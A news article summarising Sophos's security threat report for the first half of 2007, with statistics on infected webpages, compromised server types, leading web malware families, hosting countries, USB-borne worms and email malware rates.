Threat Report: Record number of Web-borne attacks during 2007

Sophos has published new research into the first six months of cybercrime in 2007. The Sophos Security Threat Report examines existing and emerging security trends and has identified a sharp rise in the number of web threats, as well as the countries and server types hosting the most infected sites.

The first half of 2007 has seen an explosion in threats spread via the web, which has now taken over from email as the preferred vector of attack for financially motivated cybercriminals. Indeed, in June alone Sophos’s global network of monitoring stations uncovered a record number of infected webpages – approximately 29,700 – each day. In contrast, earlier in 2007, the number of malicious pages detected stood as low as just 5,000 per day.

Sophos blocks access to millions of webpages to protect customers from malware and inappropriate content. Taking a snapshot of just one million of those webpages, experts found that 28.8 percent were hosting malware. A further 28.0 percent were blocked due to the adult nature of their content, most commonly because they were pornography or gambling sites. Pages set up by spammers accounted for 19.4 percent and 4.3 percent were classed as illegal sites, for instance, they were peddling pirated software or were phishing sites. Of the websites containing malicious code, just one in five had been designed specifically for malicious activity, with the remaining 80 percent made up of legitimate sites that have fallen victim to hackers.

Apache is the most compromised server

By compromising a single file on a web server, cybercriminals can easily and quickly cross-contaminate a huge number of websites, as the infected file may form part of a plethora of unrelated pages, all of which are published from the same server.

The breakdown of the world’s top server types affected by web threats in the first six months of 2007 reads as follows:

1.    Apache              51.0%
2.    Microsoft IIS 6     34.0%
3.    Microsoft IIS 5      9.0%
5.    nginx                3.0%

      Other                3.0%

The fact that more than half of all infected web pages were hosted on Apache servers demonstrates that infection is not simply a Windows problem. Earlier this year, during a global ObfJS attack, in which legitimate sites were compromised so that they could serve up a malicious code, 98 percent of affected servers were running Apache – many of which were hosted on UNIX rather than Windows platforms.

“With a whopping 80 percent of all infected webpages found on legitimate sites, it begs the question as to why web hosts are not taking the necessary steps to properly secure their servers,” said Graham Cluley, senior technology consultant at Sophos. “Simple measures such as keeping up to date with security patches will go a long way towards thwarting this problem – the fewer holes in server setups, the lower the risk of infection. Web hosts that are currently not behaving responsibly must bite the bullet and take better care of their sites. Just using Apache on your web server doesn’t mean you are now bullet-proof from hackers trying to plant malicious code on your site. It will be a wake-up call for some to see that malware is not just a Microsoft problem.”

Top web-based threats of 2007 – so far

The top ten list of web-based malware hosted on these infected sites during the first six months of 2007 reads as follows:

1.    Mal/Iframe          49.2%
2.    Troj/Fujif           7.9%
3.    JS/EncIFra           7.3%
4.    Troj/Psyme           8.3%
5.    Troj/Decdec          6.9%
6.    Troj/Ifradv          4.1%
7.    Mal/ObfJS            2.5%
8.    Mal/Packer           1.5%
9.    VBS/Redlof           1.1%
10.   Mal/FunDF            0.9%

      Other               10.3%

Mal/Iframe, which works by injecting malicious code onto web pages, dominates this chart, accounting for almost half of the world’s infected URLs. Furthermore, it shows no sign of abating – in a recent potent attack, more than 10,000 web pages were infected, the majority of which were on legitimate webpages hosted by one of Italy’s largest ISPs.

“Mal/Iframe is a textbook example of a spawning web threat that targets and exploits vulnerable sites regardless of whether the content is about pottery or pornography,” continued Cluley. “Web security solutions must go beyond blocking websites based simply on category – a gambling site may seem more of a threat, but sometimes the most innocuous sounding site can pose the greatest danger.”

Most infected webpages hosted in China

The top ten list of countries hosting malware-infected web pages during the first half of 2007 reads as follows:

1.    China               53.9%
2.    United States       27.2%
3.    Russia               4.5%
4.    Germany              3.5%
5.    Ukraine              1.2%
6.    France               1.1%
7.    Canada               0.8%
8.    United Kingdom       0.7%
9=    Taiwan               0.6%
9=    South Korea          0.6%

      Other                5.9%

China, which at the end of 2006 hosted just over a third of all malware, has now overtaken the US, and in the first six months of 2007 was responsible for hosting more than half of all web threats reported to Sophos in this period. China’s dramatic rise in the chart is primarily due to widespread Mal/Iframe infections on Chinese hosted web pages. In fact, more than 80 percent of the country’s compromised web pages are infected with this malware.

Hackers turn to USB keys and PFDs to commit cybercrimes

The first half of 2007 has seen a resurgence in the spread of malware via removable drives – no longer the floppy disk that was the vector of virus distribution in the early 1990s – but USB memory sticks. Using this method, hackers are able to take advantage of users who have “auto-run” enabled on their Windows PC to automatically execute code as soon as the stick has been attached to the computer. A notable example this year is the LiarVB-A worm which spread information about AIDS and HIV via USB keys.

“USB sticks are a growing concern for businesses – they are mass produced, cheap and therefore the perfect choice for tradeshow goody-bags and marketing departments keen to swap prizes for sales leads,” continued Cluley. “Users must tread carefully when it comes to unknown drives – even if it’s been freshly purchased from a shop, as you don’t know what you might be plugging into your network.”

Another new tactic employed by cybercriminals during this period has been the use of attachments in spam messages. To avoid detection by less sophisticated gateway filtering products, there is a growing trend for spammers to use PDF files carrying a graphical version of their marketing message, in their attempt to reach potential customers.

Email still a cause for concern

Email threats continue to cause concern for businesses and, although they have become eclipsed by web-based threats, the actual amount of email-borne malware has remained constant during the past year. The proportion of infected email during the first half of 2007 was 1 in 337, or 0.29 percent of all messages. More than 8,000 new versions of the Mal/HckPk threat were seen during 2007, as it was used to disguise widespread email attacks like Dref and Dorf.